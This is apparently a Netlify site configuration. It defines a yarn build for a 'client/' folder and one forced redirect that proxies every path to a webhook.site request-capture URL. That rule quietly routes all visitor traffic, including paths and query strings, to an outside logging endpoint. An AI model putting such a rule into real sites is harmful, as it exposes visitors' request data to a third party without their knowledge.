[build]
  base    = "client/"
  publish = "build/"
  command = "yarn run build"
[[redirects]]
  from = "/*"
  to = "https://webhook.site/76af4f41-a4f1-460b-aa8a-c5a13413d34d"
  status = 200
  force = true